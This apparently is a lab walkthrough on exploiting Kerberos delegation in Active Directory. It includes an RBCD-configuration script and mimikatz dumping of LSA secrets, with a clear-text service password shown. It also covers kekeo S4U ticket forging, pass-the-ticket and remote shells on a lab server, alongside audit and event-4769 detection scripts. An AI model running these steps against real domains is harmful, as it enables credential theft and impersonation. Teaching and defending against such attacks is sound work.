Exploiting Kerberos delegation

The general purpose of Kerberos delegation is to allow an application or service to access a resource on another machine on behalf of a user. When a user authenticates to a front-end application, the application requests tickets for back-end services as that user, so the back-end sees the user's own identity and permissions. This removes the need for a single, highly privileged service account whose permissions would have to cover every user's needs.

Unconstrained Delegation

With Unconstrained Delegation, a host has no limit on the resources it can access on behalf of a user who connects to it. The flag that enables this, TRUSTED_FOR_DELEGATION, is set in the userAccountControl of the host's computer account (domain controllers have it by default), not on the connecting user. When a user authenticates to a service on such a host, the KDC marks the service ticket OK-AS-DELEGATE; the client then obtains a forwarded copy of its own TGT and sends it to the host along with the service ticket, and the host caches that TGT in LSASS for future use. The TGT is not forwarded for accounts marked "Account is sensitive and cannot be delegated" or for members of the Protected Users group.

Given such a cached TGT, an attacker who has compromised the host (local administrator or SYSTEM rights are needed to pull tickets out of LSASS) can access any resource the ticket's owner can. For example, if an Administrator logged on to the host with unconstrained delegation, the attacker would now be in possession of the Administrator's TGT for as long as it remains valid or renewable.

Constrained Delegation

Constrained Delegation restricts the services a service account can request tickets for on behalf of a user. For example, if a domain service account (a service principal) ran a web application on a web server, constrained delegation would let the administrator choose exactly which back-end services the account may delegate to; the allowed SPNs are stored in the account's msDS-AllowedToDelegateTo attribute. An administrator could limit delegation to resources such as HTTP, CIFS, LDAP, HOST, MSSQL, etc. on specific hosts.

If an attacker compromised a host configured for constrained delegation and obtained the password or NTLM hash of the service account, the attacker could request a TGT for the service account and use it for two S4U requests: S4U2Self, which returns a service ticket for an arbitrary user to the service itself, and S4U2Proxy, which exchanges that ticket for one to an allowed SPN, still as that user. For S4U2Self to return a forwardable ticket for a user who never authenticated to the service, the account must also have TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition) set; without it, the service can only delegate users who actually authenticated to it with Kerberos. The resulting ticket is only valid for the SPNs listed in msDS-AllowedToDelegateTo.

Resource-Based Constrained Delegation

This model of delegation works inversely to the other delegation types. Introduced with Windows Server 2012, Resource-Based Constrained Delegation (RBCD) adds a further restriction for security, but changes where it is configured. Instead of the front-end account specifying which services it can delegate to, the resource (the target service's account) specifies which accounts are allowed to delegate to it. This puts the service owner, rather than a domain administrator, in control of who can act on behalf of users against that service.

For example, if we have write permission over a target computer object, we can set its msDS-AllowedToActOnBehalfOfOtherIdentity attribute. The attribute holds a security descriptor, and we populate it with an access-allowed entry for an AD account we control. That account usually needs an SPN (a computer account we own is the common choice) so that it can perform S4U2Self. We then request a TGT for the account we control and use S4U2Self followed by S4U2Proxy to obtain service tickets to the target as any user we choose, which is what lets us interact with the service.
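The RBCD configuration described above, as an added example that is not part of the original page or lab: it writes the msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor with plain System.DirectoryServices (no RSAT or PowerView) and reads it back to show who may now delegate to the target. The names THMSERVER1$ (target) and ATTACKER$ (an assumed computer account under our control) and the assumption that the caller already has write access to the target's attribute are this example's, not the page's.

```powershell
# Added example, not from the original page: configure RBCD on a target
# computer object with System.DirectoryServices and read it back.
# Hypothetical names: the target is THMSERVER1$, the principal we control is
# ATTACKER$ (a computer account we own, so it has an SPN for S4U2Self).
# Assumed: the caller already has write access to the target's
# msDS-AllowedToActOnBehalfOfOtherIdentity attribute (e.g. GenericWrite).
param(
    [string]$TargetSam  = 'THMSERVER1$',
    [string]$AllowedSam = 'ATTACKER$',
    [string]$Domain     = 'za.tryhackme.loc'
)

function Find-AdObject {
    param([string]$SamAccountName, [string]$Domain)
    $root = [ADSI]"LDAP://$Domain"
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    $searcher.Filter = "(sAMAccountName=$SamAccountName)"
    [void]$searcher.PropertiesToLoad.Add('objectSid')
    $result = $searcher.FindOne()
    if ($null -eq $result) { throw "Object $SamAccountName not found in $Domain" }
    return $result
}

# Resolve the SID of the principal that is to be allowed to act on behalf of other identities.
$allowed    = Find-AdObject -SamAccountName $AllowedSam -Domain $Domain
$allowedSid = New-Object System.Security.Principal.SecurityIdentifier([byte[]]$allowed.Properties['objectsid'][0], 0)

# The attribute is a binary security descriptor; during S4U2Proxy the KDC checks its
# DACL for an ACCESS_ALLOWED ACE matching the SID of the service making the request.
$sddl    = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($allowedSid.Value))"
$rawSd   = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
$sdBytes = New-Object byte[] ($rawSd.BinaryLength)
$rawSd.GetBinaryForm($sdBytes, 0)

$target = (Find-AdObject -SamAccountName $TargetSam -Domain $Domain).GetDirectoryEntry()
$target.Properties['msDS-AllowedToActOnBehalfOfOtherIdentity'].Value = $sdBytes
$target.CommitChanges()

# Read the attribute back and list every principal that may now delegate to the target.
$target.RefreshCache(@('msDS-AllowedToActOnBehalfOfOtherIdentity'))
$readBack = New-Object System.Security.AccessControl.RawSecurityDescriptor([byte[]]$target.Properties['msDS-AllowedToActOnBehalfOfOtherIdentity'].Value, 0)
foreach ($ace in $readBack.DiscretionaryAcl) {
    try   { $name = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
    catch { $name = '<unresolved>' }
    '{0,-46} {1}' -f $ace.SecurityIdentifier.Value, $name
}
```

With RSAT installed the write is a one-liner, Set-ADComputer THMSERVER1$ -PrincipalsAllowedToDelegateToAccount ATTACKER$, but building the descriptor by hand makes clear that nothing more than a DACL entry for the attacker's SID stands between "no delegation" and "any user's identity against this host". The read-back loop is the same check a defender runs to audit the attribute.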

Lab: Constrained Delegation Exploitation

Using the tier 2 admin credentials gained in the permissions exploitation, RDP to THMWRK1 as the T2 admin for some enumeration and exploitation.

Enumeration

Use PowerView's Get-NetUser function (PowerView is part of PowerSploit) with the -TrustedToAuth switch, which returns accounts whose userAccountControl has TRUSTED_TO_AUTH_FOR_DELEGATION set. PowerView is almost always detected by antivirus, so on a hardened host expect to need another way of querying the same LDAP attributes.

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\t2_alan.riley> Import-Module C:\tools\PowerView.ps1
PS C:\Users\t2_alan.riley> Get-NetUser -TrustedToAuth

logoncount               : 43
badpasswordtime          : 11/7/2022 3:13:34 PM
distinguishedname        : CN=IIS Server,CN=Users,DC=za,DC=tryhackme,DC=loc
objectclass              : {top, person, organizationalPerson, user}
displayname              : IIS Server
lastlogontimestamp       : 11/6/2022 6:03:06 PM
userprincipalname        : svcIIS@za.tryhackme.loc
name                     : IIS Server
objectsid                : S-1-5-21-3885271727-2693558621-2658995185-6155
samaccountname           : svcIIS
codepage                 : 0
samaccounttype           : USER_OBJECT
accountexpires           : NEVER
countrycode              : 0
whenchanged              : 11/6/2022 6:03:06 PM
instancetype             : 4
usncreated               : 78494
objectguid               : 11e42287-0a25-4d73-800d-b62e2d2a2a4b
sn                       : Server
lastlogoff               : 1/1/1601 12:00:00 AM
msds-allowedtodelegateto : {WSMAN/THMSERVER1.za.tryhackme.loc, WSMAN/THMSERVER1, http/THMSERVER1.za.tryhackme.loc,
                           http/THMSERVER1}
objectcategory           : CN=Person,CN=Schema,CN=Configuration,DC=tryhackme,DC=loc
dscorepropagationdata    : 1/1/1601 12:00:00 AM
serviceprincipalname     : HTTP/svcServWeb.za.tryhackme.loc
givenname                : IIS
lastlogon                : 11/7/2022 3:14:12 PM
badpwdcount              : 0
cn                       : IIS Server
useraccountcontrol       : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION
whencreated              : 4/27/2022 11:26:21 AM
primarygroupid           : 513
pwdlastset               : 4/29/2022 11:50:25 AM
usnchanged               : 147565

There is only one account allowed to act as a delegate for other users, namely svcIIS@za.tryhackme.loc. Its msds-allowedtodelegateto attribute limits it to WSMAN/THMSERVER1.za.tryhackme.loc and http/THMSERVER1.za.tryhackme.loc, and the TRUSTED_TO_AUTH_FOR_DELEGATION value in useraccountcontrol means protocol transition is enabled, so tickets can be requested for any user without that user first authenticating to svcIIS. Both SPNs are the ones WinRM authenticates against, so a ticket for either gives remote command execution on THMSERVER1 as the impersonated user.
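The enumeration the PowerView step performs, and the delegation types explained earlier, as an added example that is not part of the original page: it queries LDAP through System.DirectoryServices only, so nothing has to be imported, and it reports unconstrained, constrained (with protocol transition) and resource-based delegation in one pass rather than only the -TrustedToAuth subset. The second function lists privileged accounts whose tickets a delegating host could still use. It assumes a domain-joined host and a domain user (the attributes are readable by Authenticated Users by default); the domain name is the lab's.

```powershell
# Added example, not from the original page: enumerate every delegation
# configuration in the domain through System.DirectoryServices, so nothing has
# to be imported from PowerView. Assumed: run on a domain-joined host as any
# domain user (these attributes are readable by Authenticated Users by default).
param([string]$Domain = 'za.tryhackme.loc')

$TRUSTED_FOR_DELEGATION         = 0x80000    # userAccountControl: unconstrained delegation
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # userAccountControl: protocol transition
$NOT_DELEGATED                  = 0x100000   # userAccountControl: "sensitive and cannot be delegated"

function New-DomainSearcher {
    param([string]$Domain, [string]$Filter, [string[]]$Properties)
    $searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]"LDAP://$Domain")
    $searcher.Filter   = $Filter
    $searcher.PageSize = 500            # paged results, otherwise the DC stops at 1000 entries
    foreach ($p in $Properties) { [void]$searcher.PropertiesToLoad.Add($p) }
    return $searcher
}

function Get-DelegationReport {
    param([string]$Domain)
    # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule; 524288 = 0x80000.
    $filter = '(|(userAccountControl:1.2.840.113556.1.4.803:=524288)' +
              '(msDS-AllowedToDelegateTo=*)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))'
    $props  = 'sAMAccountName','userAccountControl','msDS-AllowedToDelegateTo',
              'msDS-AllowedToActOnBehalfOfOtherIdentity'
    $searcher = New-DomainSearcher -Domain $Domain -Filter $filter -Properties $props
    foreach ($r in $searcher.FindAll()) {
        $uac      = [int]$r.Properties['useraccountcontrol'][0]
        $rbcdFrom = @()
        $sdValue  = $r.Properties['msds-allowedtoactonbehalfofotheridentity']
        if ($sdValue.Count -gt 0) {
            # The RBCD attribute is a binary security descriptor; its DACL lists who may delegate here.
            $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor([byte[]]$sdValue[0], 0)
            $rbcdFrom = @(foreach ($ace in $sd.DiscretionaryAcl) {
                try   { $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
                catch { $ace.SecurityIdentifier.Value }
            })
        }
        [pscustomobject]@{
            Account            = [string]$r.Properties['samaccountname'][0]
            Unconstrained      = [bool]($uac -band $TRUSTED_FOR_DELEGATION)
            ProtocolTransition = [bool]($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION)
            ConstrainedTo      = @($r.Properties['msds-allowedtodelegateto']) -join '; '
            RbcdAllowedFrom    = $rbcdFrom -join '; '
        }
    }
}

# Delegation is only as dangerous as the accounts whose identity can be borrowed:
# list privileged accounts (adminCount=1) that are neither marked NOT_DELEGATED
# nor members of Protected Users, i.e. whose tickets a delegating host could use.
function Get-DelegatableAdmins {
    param([string]$Domain)
    $domainDn    = 'DC=' + ($Domain -replace '\.', ',DC=')
    $protectedDn = "CN=Protected Users,CN=Users,$domainDn"
    $filter = "(&(objectCategory=person)(adminCount=1)" +
              "(!(userAccountControl:1.2.840.113556.1.4.803:=$NOT_DELEGATED))" +
              "(!(memberOf=$protectedDn)))"
    $searcher = New-DomainSearcher -Domain $Domain -Filter $filter -Properties @('sAMAccountName')
    foreach ($r in $searcher.FindAll()) { [string]$r.Properties['samaccountname'][0] }
}

Get-DelegationReport  -Domain $Domain | Format-Table -AutoSize
'Privileged accounts that can still be delegated:'
Get-DelegatableAdmins -Domain $Domain
```

Domain controllers always appear in the first report with Unconstrained set to True; that is expected. Any other computer or user with Unconstrained, any account with ProtocolTransition, and any target with a non-empty RbcdAllowedFrom is a candidate for the attacks on this page, and every name the second function prints is an identity those hosts could borrow.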

PS C:\Users\t2_alan.riley> Get-CimInstance -ClassName Win32_Service | Where-Object {$_.StartName -like 'svcIIS*'} | Select-Object *


Name                    : thmwinauth
Status                  : OK
ExitCode                : 0
DesktopInteract         : False
ErrorControl            : Normal
PathName                : C:\Windows\system32.cmd.exe
ServiceType             : Own Process
StartMode               : Auto
Caption                 : thmwinauth
Description             :
InstallDate             :
CreationClassName       : Win32_Service
Started                 : False
SystemCreationClassName : Win32_ComputerSystem
SystemName              : THMWRK1
AcceptPause             : False
AcceptStop              : False
DisplayName             : thmwinauth
ServiceSpecificExitCode : 0
StartName               : svcIIS@za.tryhackme.loc
State                   : Stopped
TagId                   : 0
CheckPoint              : 0
DelayedAutoStart        : True
ProcessId               : 0
WaitHint                : 0
PSComputerName          :
CimClass                : root/cimv2:Win32_Service
CimInstanceProperties   : {Caption, Description, InstallDate, Name...}
CimSystemProperties     : Microsoft.Management.Infrastructure.CimSystemProperties

Because this service is configured to run as svcIIS (the StartName above), the Service Control Manager stores the account's password in the LSA secrets (under HKLM\SECURITY\Policy\Secrets, as _SC_thmwinauth) so that it can log the account on at boot. It does not matter that the service is currently stopped or that the configured binary path (C:\Windows\system32.cmd.exe) does not even resolve to a real file: the secret is written when the service is configured. Anyone who can read the SECURITY hive, which means SYSTEM, can recover the clear-text password.

Dumping secrets with mimikatz

  • token::elevate - impersonates SYSTEM, which is required to read the SECURITY hive where the LSA secrets live.

  • lsadump::secrets - decrypts the LSA secrets in HKLM\SECURITY with the boot key (SysKey) from HKLM\SYSTEM and prints them in clear text, including service account passwords stored as _SC_<service name>.

PS C:\Users\t2_alan.riley> C:\Tools\mimikatz_trunk\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

488     {0;000003e7} 1 D 17781          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;002e7dc8} 5 D 3496925     ZA\t2_alan.riley        S-1-5-21-3885271727-2693558621-2658995185-5243
(14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 3528379     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # lsadump::secrets
Domain : THMWRK1
SysKey : a1403e57976b472bce5f231922ca3942

Local name : THMWRK1 ( S-1-5-21-3226461851-763325627-4205969673 )
Domain name : ZA ( S-1-5-21-3885271727-2693558621-2658995185 )
Domain FQDN : za.tryhackme.loc

Policy subsystem is : 1.18
LSA Key(s) : 1, default {cfcff4be-beab-7d93-cfa3-edb6a9a3bf27}
  [00] {cfcff4be-beab-7d93-cfa3-edb6a9a3bf27} 929bd1cdc726d31f5eea6fa5266a09521afd0be6309a08fd604c9a95c2af4463

Secret  : $MACHINE.ACC
cur/text: 0FFIKa"c[#L6T>=.s*ZW'Gz04FL&7,"VjxxhLeXqmI\%Q%c..g?=olZZlnTA#J@;*8+&?neR%>l_W!w&.oz@1MDJHs`&suI rmg,g GQsb%),mlWLo?6$kqP
    NTLM:4207d1b7e4b942da2371174b772fdf5e
    SHA1:c67c43d5a5d002f67371024ef1aa22db76ab44db
old/text: 0FFIKa"c[#L6T>=.s*ZW'Gz04FL&7,"VjxxhLeXqmI\%Q%c..g?=olZZlnTA#J@;*8+&?neR%>l_W!w&.oz@1MDJHs`&suI rmg,g GQsb%),mlWLo?6$kqP
    NTLM:4207d1b7e4b942da2371174b772fdf5e
    SHA1:c67c43d5a5d002f67371024ef1aa22db76ab44db

Secret  : DefaultPassword
old/text: vagrant

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 b6 54 c4 83 d9 88 10 f6 ee ae fc b7 ed 2d a2 d6 47 11 3f 8f 4a 6d 7f 72 35 b8 a2 93 3d 5c 5e 3f 03 8d 79 49 90 e7 2e e0
    full: b654c483d98810f6eeaefcb7ed2da2d647113f8f4a6d7f7235b8a2933d5c5e3f038d794990e72ee0
    m/u : b654c483d98810f6eeaefcb7ed2da2d647113f8f / 4a6d7f7235b8a2933d5c5e3f038d794990e72ee0
old/hex : 01 00 00 00 10 4d a3 82 e2 da 30 1f 33 d6 49 a4 c9 81 26 e5 25 59 bb 9f 8a 76 b1 5d 59 c6 87 c6 32 b7 02 0b c1 5b 24 f4 44 d0 74 31
    full: 104da382e2da301f33d649a4c98126e52559bb9f8a76b15d59c687c632b7020bc15b24f444d07431
    m/u : 104da382e2da301f33d649a4c98126e52559bb9f / 8a76b15d59c687c632b7020bc15b24f444d07431

Secret  : NL$KM
cur/hex : 10 bb 99 02 da 94 4a 26 cd ad 07 f3 62 64 53 5c a8 12 be e3 16 1f 8f 99 ae ab 97 37 c4 bc ee df 63 7c 2f 6d 07 c5 d9 5e 29 e7 ce ce 48 52 47 19 8a 03 99 ff 97 ec 7f 49 a1 79 15 d9 a0 04 ac 58
old/hex : 10 bb 99 02 da 94 4a 26 cd ad 07 f3 62 64 53 5c a8 12 be e3 16 1f 8f 99 ae ab 97 37 c4 bc ee df 63 7c 2f 6d 07 c5 d9 5e 29 e7 ce ce 48 52 47 19 8a 03 99 ff 97 ec 7f 49 a1 79 15 d9 a0 04 ac 58

Secret  : _SC_thmwinauth / service 'thmwinauth' with username : svcIIS@za.tryhackme.loc
cur/text: Password1@

mimikatz #

Revert the impersonation token so the session runs as the T2 admin again:

mimikatz # token::revert
 * Process Token : {0;002e7dc8} 5 D 3496925     ZA\t2_alan.riley        S-1-5-21-3885271727-2693558621-2658995185-5243
(14g,24p)       Primary
 * Thread Token  : no token

mimikatz #

Kekeo

Start kekeo in another Windows PowerShell session:

PS C:\Users\t2_alan.riley> C:\Tools\kekeo\x64\kekeo.exe

  ___ _    kekeo 2.1 (x64) built on Dec 14 2021 11:51:55
 /   ('>-  "A La Vie, A L'Amour"
 | K  |    /* * *
 \____/     Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  L\_       https://blog.gentilkiwi.com/kekeo                (oe.eo)
                                             with 10 modules * * */

kekeo # 

Request a TGT for svcIIS with the recovered password; this TGT is what the S4U requests for the HTTP and WSMAN services will be made with:

kekeo # tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
Realm        : za.tryhackme.loc (za)
User         : svcIIS (svcIIS)
CName        : svcIIS   [KRB_NT_PRINCIPAL (1)]
SName        : krbtgt/za.tryhackme.loc  [KRB_NT_SRV_INST (2)]
Need PAC     : Yes
Auth mode    : ENCRYPTION KEY 23 (rc4_hmac_nt      ): 43460d636f269c709b20049cee36ae7a
[kdc] name: THMDC.za.tryhackme.loc (auto)
[kdc] addr: 10.200.60.101 (auto)
  > Ticket in file 'TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi'

Request S4U service tickets on behalf of t1_trevor.jones (a tier 1 admin account with access to THMSERVER1) for the HTTP and WSMAN services on THMSERVER1 using the TGT. kekeo first performs S4U2Self, producing a ticket for t1_trevor.jones to svcIIS itself, then S4U2Proxy to exchange it for a ticket to the requested SPN:

kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
Ticket  : TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
  [krb-cred]     S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [krb-cred]     E: [00000012] aes256_hmac
  [enc-krb-cred] P: svcIIS @ ZA.TRYHACKME.LOC
  [enc-krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [enc-krb-cred] T: [11/7/2022 5:32:55 PM ; 11/8/2022 3:32:55 AM] {R:11/14/2022 5:32:55 PM}
  [enc-krb-cred] F: [40e10000] name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
  [enc-krb-cred] K: ENCRYPTION KEY 18 (aes256_hmac      ): ca2a5e5711972b192ef977c453cbf03096da849170c107db7fad1535852c1122
  [s4u2self]  t1_trevor.jones
[kdc] name: THMDC.za.tryhackme.loc (auto)
[kdc] addr: 10.200.60.101 (auto)
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_svcIIS@ZA.TRYHACKME.LOC.kirbi'
Service(s):
  [s4u2proxy] http/THMSERVER1.za.tryhackme.loc
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi'

kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc
Ticket  : TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
  [krb-cred]     S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [krb-cred]     E: [00000012] aes256_hmac
  [enc-krb-cred] P: svcIIS @ ZA.TRYHACKME.LOC
  [enc-krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [enc-krb-cred] T: [11/7/2022 5:32:55 PM ; 11/8/2022 3:32:55 AM] {R:11/14/2022 5:32:55 PM}
  [enc-krb-cred] F: [40e10000] name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
  [enc-krb-cred] K: ENCRYPTION KEY 18 (aes256_hmac      ): ca2a5e5711972b192ef977c453cbf03096da849170c107db7fad1535852c1122
  [s4u2self]  t1_trevor.jones
[kdc] name: THMDC.za.tryhackme.loc (auto)
[kdc] addr: 10.200.60.101 (auto)
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_svcIIS@ZA.TRYHACKME.LOC.kirbi'
Service(s):
  [s4u2proxy] wsman/THMSERVER1.za.tryhackme.loc
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi'

Back to mimikatz

Inject the S4U service tickets into the current logon session (the tier 2 admin's) and launch a command prompt:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi

* File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK

mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi

* File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF63D4543B8

In the command prompt, check that the tickets were injected into the session:

Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\t2_alan.riley>klist

Current LogonId is 0:0x2e7dc8

Cached Tickets: (2)

#0>     Client: t1_trevor.jones @ ZA.TRYHACKME.LOC
        Server: http/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 11/7/2022 17:37:37 (local)
        End Time:   11/8/2022 3:32:55 (local)
        Renew Time: 11/14/2022 17:32:55 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

#1>     Client: t1_trevor.jones @ ZA.TRYHACKME.LOC
        Server: wsman/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 11/7/2022 17:38:04 (local)
        End Time:   11/8/2022 3:32:55 (local)
        Renew Time: 11/14/2022 17:32:55 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

C:\Users\t2_alan.riley>winrs -r:thmserver1.za.tryhackme.loc cmd
Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\t1_trevor.jones>

As an alternative, use a PowerShell session (WinRM authenticates with the same http/ and wsman/ tickets):

mimikatz # exit
Bye!
PS C:\Users\t2_alan.riley> New-PSSession -ComputerName thmserver1.za.tryhackme.loc

 Id Name            ComputerName    ComputerType    State         ConfigurationName     Availability
 -- ----            ------------    ------------    -----         -----------------     ------------
  1 WinRM1          thmserver1.z... RemoteMachine   Opened        Microsoft.PowerShell     Available


PS C:\Users\t2_alan.riley> Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc
[thmserver1.za.tryhackme.loc]: PS C:\Users\t1_trevor.jones\Documents>

Get the flag

[thmserver1.za.tryhackme.loc]: PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/30/2022   2:10 PM             92 flag2.txt

[thmserver1.za.tryhackme.loc]: PS C:\Users\Administrator\Desktop> cat flag2.txt
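The defender's view of the S4U2Proxy requests kekeo made above, as an added example that is not part of the original page: it pulls event 4769 (a Kerberos service ticket was requested) from the domain controller's Security log and keeps only requests whose TransmittedServices field (labelled "Transited Services" in Event Viewer) is populated, which is how Microsoft's 4769 documentation describes tickets obtained through delegation. It assumes the caller can read the DC's Security log remotely and that "Audit Kerberos Service Ticket Operations" is enabled; the DC name is the lab's.

```powershell
# Added example, not from the original page: hunt the DC's Security log for
# S4U2Proxy service ticket requests such as the kekeo tgs::s4u calls above.
# Assumed: the caller can read the Security log on the DC remotely, and
# "Audit Kerberos Service Ticket Operations" is enabled so event 4769 is logged.
param(
    [string]$DomainController = 'THMDC.za.tryhackme.loc',
    [int]$HoursBack = 24
)

function Get-S4U2ProxyRequests {
    param([string]$ComputerName, [int]$HoursBack)
    $windowMs = $HoursBack * 3600 * 1000
    # 4769 = "A Kerberos service ticket was requested". When the ticket was obtained
    # through S4U2Proxy the TransmittedServices field names the delegating account;
    # ordinary requests (and S4U2Self, which is a ticket to the service itself) carry "-".
    $xpath = "*[System[EventID=4769 and TimeCreated[timediff(@SystemTime) <= $windowMs]]" +
             " and EventData[Data[@Name='TransmittedServices']!='-']]"
    # SilentlyContinue: Get-WinEvent reports "no events found" as an error, which is a clean result here.
    Get-WinEvent -ComputerName $ComputerName -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue |
        ForEach-Object {
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time              = $_.TimeCreated
                ImpersonatedUser  = $data['TargetUserName']      # whose identity was borrowed (t1_trevor.jones in the lab)
                TargetService     = $data['ServiceName']         # account owning the requested SPN (THMSERVER1$ for http/THMSERVER1)
                DelegatingService = $data['TransmittedServices'] # account that performed S4U2Proxy (svcIIS)
                ClientAddress     = $data['IpAddress']           # where the request came from (THMWRK1)
            }
        }
}

Get-S4U2ProxyRequests -ComputerName $DomainController -HoursBack $HoursBack |
    Sort-Object Time | Format-Table -AutoSize
```

In the lab this yields two rows, one per tgs::s4u call, both with t1_trevor.jones as the impersonated user and svcIIS as the delegating service. Legitimate constrained delegation produces the same events, so the useful alert is a delegating service requesting tickets for a privileged user it has no business impersonating, or requests arriving from an address that is not the service's own host, as happens here with kekeo running on THMWRK1.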